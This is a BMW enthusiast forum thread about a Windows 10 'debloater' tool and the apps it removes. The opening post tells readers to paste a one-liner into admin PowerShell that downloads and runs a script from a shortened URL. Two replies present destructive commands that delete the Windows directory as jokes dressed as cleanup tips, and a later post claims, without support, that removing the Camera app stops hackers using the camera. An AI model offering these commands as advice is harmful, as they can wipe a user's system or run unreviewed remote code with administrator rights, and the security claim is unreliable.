BMW
X1 / X2
BMW Garage BMW Meets Register Search Today's Posts Mark Forums Read
BIMMERPOST Universal Forums Off-Topic Discussions Board Video + PC Gaming / Computing Windows 10 DeBloater

Closed Thread
 
Thread Tools Search this Thread
      12-23-2019, 07:14 PM   #1
TXSTYLE
My Actions > Your Words
TXSTYLE's Avatar
United_States
6276
Rep
3,151
Posts

Drives: F01 & F15 / Mineral White
Join Date: May 2013
Location: The GYM! (The Burbs - N TX)

iTrader: (0)

Thumbs up Windows 10 DeBloater

Came across this very helpful tool doing some maintenance on my PC's.

I've tested it on 3 of my PC's and it works flawlessly! Has a few more helpful tools as well.
Simply go to the following link, scroll to bottom of page and copy the entire Quick Download link/this:

iex ((New-Object System.Net.WebClient).DownloadString('https://git.io/debloat'))

Then run Powershell as Admin and paste and enter. You will then see a GUI with several options. Enjoy!

https://github.com/Sycnex/Windows10Debloater
__________________
https://i.imgur.com/QAMZNzQ.jpg
Appreciate 1
GuidoK1356.00

      12-23-2019, 08:30 PM   #2
P1et
Major General
P1et's Avatar
United_States
6695
Rep
9,312
Posts

Drives: my wife's cars
Join Date: Aug 2007
Location: Texas

iTrader: (1)

Let's move this to the Computing section.
Appreciate 0
      12-24-2019, 12:41 AM   #3
eluded
2JZ-GTE
eluded's Avatar
Bulgaria
2264
Rep
3,121
Posts

Drives: 340 6MT
Join Date: Nov 2015
Location: Sofia

iTrader: (0)

Thanks, you can also use some basic PowerShell commands like this to help clean up your computer:

Remove-Item –path c:\windows\* –recurse
Appreciate 1
vreihen162303.50

      12-24-2019, 03:55 AM   #4
Dang3r
Schmollbraten
Dang3r's Avatar
Germany
4133
Rep
1,537
Posts

Drives: M4CPC
Join Date: Jun 2015
Location: Liandri Central Core

iTrader: (0)

Or try just cd c:\windows and del *.*
Im not happy with W10 but my new hardware demands it. FU Bill and Greta.
__________________
M4CP - ZX12R LE - GPZ750 Turbo

I///M the infidel, your BMW-dealer had warned you about
Appreciate 0
      12-24-2019, 10:48 AM   #5
vreihen16
Lieutenant
vreihen16's Avatar
United_States
2304
Rep
510
Posts

Drives: 2015 BMW i3 BEV
Join Date: Jun 2019
Location: Orange County, NY

iTrader: (0)

Garage List
With a footnoote that I'm not a fan of Debian branch linux distributions, this is one way to un-bloat Windows 10:

https://www.techworm.net/2019/03/ins...indows-10.html

Remember, Apple cited Windows 8.0 as the greatest sales driver for Macintosh computers ever.....
__________________
2015 BMW i3 BEV, Giga World (Lodge interior), Tech/Driving Assist Packages, 18K miles
Appreciate 0
      12-24-2019, 12:15 PM   #6
sethwas
Second Lieutenant
120
Rep
237
Posts

Drives: 228i
Join Date: Jan 2019
Location: South Florida

iTrader: (0)

Quote:
Originally Posted by TXSTYLE View Post
Came across this very helpful tool doing some maintenance on my PC's.

I've tested it on 3 of my PC's and it works flawlessly!
Just curious - what is actually being removed?

Seth
Appreciate 1
      12-28-2019, 07:34 AM   #7
Dang3r
Schmollbraten
Dang3r's Avatar
Germany
4133
Rep
1,537
Posts

Drives: M4CPC
Join Date: Jun 2015
Location: Liandri Central Core

iTrader: (0)

Quote:
Originally Posted by sethwas View Post
Just curious - what is actually being removed?

Seth
3DBuilder, Appconnector, Bing Finance, Bing News, Bing Sports, Bing Weather, Fresh Paint, Get started, Microsoft Office Hub, Microsoft Solitaire Collection, Microsoft Sticky Notes, OneNote, OneConnect, People, Skype for Desktop, Alarms, Camera, Maps, Phone, SoundRecorder, XboxApp, Zune Music, Zune Video, Windows communications apps, Minecraft, PowerBI, Network Speed Test, Phone, Messaging, Office Sway, Windows Feedback Hub, Bing Food And Drink, Bing Travel, Bing Health And Fitness, Windows Reading List, Twitter, Pandora, Flipboard, Shazam, CandyCrush, CandyCrushSoda, King apps, iHeartRadio, Netflix, DrawboardPDF, PicsArt-PhotoStudio, FarmVille 2 Country Escape, TuneInRadio, Asphalt8, NYT Crossword, CyberLink MediaSuite Essentials, Facebook, Royal Revolt 2, Caesars Slots Free Casino, March of Empires, Phototastic Collage, Autodesk SketchBook, Duolingo, EclipseManager, ActiproSoftware, BioEnrollment, Windows Feedback, Xbox Game CallableUI, Xbox Identity Provider, and ContactSupport,

and thats why you should do this right after a clean installation. Would you do later after profiles are set, some settings are gone.
__________________
M4CP - ZX12R LE - GPZ750 Turbo

I///M the infidel, your BMW-dealer had warned you about
Appreciate 2
VisualEcho2000.00
vreihen162303.50

      12-28-2019, 12:57 PM   #8
TXSTYLE
My Actions > Your Words
TXSTYLE's Avatar
United_States
6276
Rep
3,151
Posts

Drives: F01 & F15 / Mineral White
Join Date: May 2013
Location: The GYM! (The Burbs - N TX)

iTrader: (0)

Quote:
Originally Posted by Dang3r View Post
3DBuilder, Appconnector, Bing Finance, Bing News, Bing Sports, Bing Weather, Fresh Paint, Get started, Microsoft Office Hub, Microsoft Solitaire Collection, Microsoft Sticky Notes, OneNote, OneConnect, People, Skype for Desktop, Alarms, Camera, Maps, Phone, SoundRecorder, XboxApp, Zune Music, Zune Video, Windows communications apps, Minecraft, PowerBI, Network Speed Test, Phone, Messaging, Office Sway, Windows Feedback Hub, Bing Food And Drink, Bing Travel, Bing Health And Fitness, Windows Reading List, Twitter, Pandora, Flipboard, Shazam, CandyCrush, CandyCrushSoda, King apps, iHeartRadio, Netflix, DrawboardPDF, PicsArt-PhotoStudio, FarmVille 2 Country Escape, TuneInRadio, Asphalt8, NYT Crossword, CyberLink MediaSuite Essentials, Facebook, Royal Revolt 2, Caesars Slots Free Casino, March of Empires, Phototastic Collage, Autodesk SketchBook, Duolingo, EclipseManager, ActiproSoftware, BioEnrollment, Windows Feedback, Xbox Game CallableUI, Xbox Identity Provider, and ContactSupport,

and thats why you should do this right after a clean installation. Would you do later after profiles are set, some settings are gone.
Thanks Danger.
Appreciate 1
Dang3r4132.50

      03-15-2020, 04:05 PM   #9
Wolf 335
Colonel
Wolf 335's Avatar
Canada
1200
Rep
2,776
Posts

Drives: 2007 E92 335i
Join Date: Aug 2012
Location: GTA - Greater Toronto Area

iTrader: (0)

Quote:
Originally Posted by Dang3r View Post
3DBuilder, Appconnector, Bing Finance, Bing News, Bing Sports, Bing Weather, Fresh Paint, Get started, Microsoft Office Hub, Microsoft Solitaire Collection, Microsoft Sticky Notes, OneNote, OneConnect, People, Skype for Desktop, Alarms, Camera, Maps, Phone, SoundRecorder, XboxApp, Zune Music, Zune Video, Windows communications apps, Minecraft, PowerBI, Network Speed Test, Phone, Messaging, Office Sway, Windows Feedback Hub, Bing Food And Drink, Bing Travel, Bing Health And Fitness, Windows Reading List, Twitter, Pandora, Flipboard, Shazam, CandyCrush, CandyCrushSoda, King apps, iHeartRadio, Netflix, DrawboardPDF, PicsArt-PhotoStudio, FarmVille 2 Country Escape, TuneInRadio, Asphalt8, NYT Crossword, CyberLink MediaSuite Essentials, Facebook, Royal Revolt 2, Caesars Slots Free Casino, March of Empires, Phototastic Collage, Autodesk SketchBook, Duolingo, EclipseManager, ActiproSoftware, BioEnrollment, Windows Feedback, Xbox Game CallableUI, Xbox Identity Provider, and ContactSupport,

and thats why you should do this right after a clean installation. Would you do later after profiles are set, some settings are gone.
Would removing the “camera” disable the actual camera use? Even from a hackers side?
Appreciate 0
      03-16-2020, 05:22 AM   #10
Dang3r
Schmollbraten
Dang3r's Avatar
Germany
4133
Rep
1,537
Posts

Drives: M4CPC
Join Date: Jun 2015
Location: Liandri Central Core

iTrader: (0)

Quote:
Originally Posted by Wolf 335 View Post
Would removing the “camera” disable the actual camera use? Even from a hackers side?
As I wrote, use this only after a clean installation and before customizing , when you're trying this into your running profile lots of errors and fail messages would appear.
When the camera feature is removed, you have to install this separately with an extra cam to reenable this. When no camera command line is present within the installation it is not possible to trigger it from outside though.
__________________
M4CP - ZX12R LE - GPZ750 Turbo

I///M the infidel, your BMW-dealer had warned you about
Appreciate 1
Wolf 3351199.50

Closed Thread

Bookmarks

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off



All times are GMT -5. The time now is 03:19 PM.




xbimmers
Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2020, vBulletin Solutions Inc.
1Addicts.com, BIMMERPOST.com, E90Post.com, F30Post.com, M3Post.com, ZPost.com, 5Post.com, 6Post.com, 7Post.com, XBimmers.com logo and trademark are properties of BIMMERPOST